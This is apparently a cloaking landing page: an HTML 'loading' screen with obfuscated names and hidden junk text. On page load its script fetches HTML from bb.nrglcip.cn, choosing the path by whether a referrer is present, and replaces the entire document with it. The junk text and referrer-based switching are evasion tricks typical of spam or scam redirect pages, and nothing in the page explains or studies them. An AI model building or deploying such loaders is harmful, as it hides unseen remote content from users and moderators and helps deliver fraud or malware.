<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .JFmqP8F {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .JFmqP8F .wfDSgb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .JFmqP8F .content {
            line-height: 50px;
            text-align: center
        }

        .JFmqP8F .img {
            width: 100%
        }

        .JFmqP8F .dTXOxVOX8yc {
            text-align: center
        }

        .JFmqP8F .dTXOxVOX8yc span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .JFmqP8F .dTXOxVOX8yc span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .JFmqP8F .dTXOxVOX8yc span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .JFmqP8F .dTXOxVOX8yc span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .JFmqP8F .dTXOxVOX8yc span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .JFmqP8F .dTXOxVOX8yc span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .JFmqP8F .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DjQs4hGhRCF6T(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var aihkc = DjQs4hGhRCF6T('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ aihkc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ aihkc +".html?a=share";
		}
		
        xy7HROko=url+"#"+new Date().getTime();
        xy7HROko && function() {
            $.get(xy7HROko, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>ODEVpscEIFrhEwsfDNqi3KZX8RifNG1Vu8LP6AmWUXIsoVku9JNNG8KrCht5gBRTPLR</div>
<b style='display:none' >m8wf5Uf35ZhEjeYzOa7cU6LDmwapVyjzJwGIVeeSKHIUwpUBYmjdwCH9lf2Gx0sbiYReT433q9c0hnwzuMfbNyYRPAmfEfk6J</b>
<a  href='#' style='display:none'>FkSlq6ylcnP62wGOcbk5XLmBCojUjSLXXY3zXeAQ5YvhXJyFOB7CUNCmuFetA45Jk</a>
<p  style='display:none'>UEWGwvUXzq3KItmSJu9uJKzws9SgHXmzruF1</p>
<h1 style='display:none' >VOYrlmmpl7F6lk5hWOje0CsgwhUEEI5Zf5ivw</h1><div class="JFmqP8F">
    <div class="wfDSgb">
        <div class="dTXOxVOX8yc">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Xly3c58LUrD1qc6wAOedUI4QwCrxRdS6QGCVBpSxKfFyq8TAnQbFNhoeeCTkWf5BBlmuR3</p>
<p  style='display:none'>Xly3c58LUrD1qc6wAOedUI4QwCrxRdS6QGCVBpSxKfFyq8TAnQbFNhoeeCTkWf5BBlmuR3</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>Ev4EdTeVqWo1bhbdLtz5HzQwzkmsToK6SURA</a>
<h1 style='display:none' >X0k5JrSDxYHSGEm9Mpvv3UkXs3opf3Y</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >X0k5JrSDxYHSGEm9Mpvv3UkXs3opf3Y</h1></body>
</html>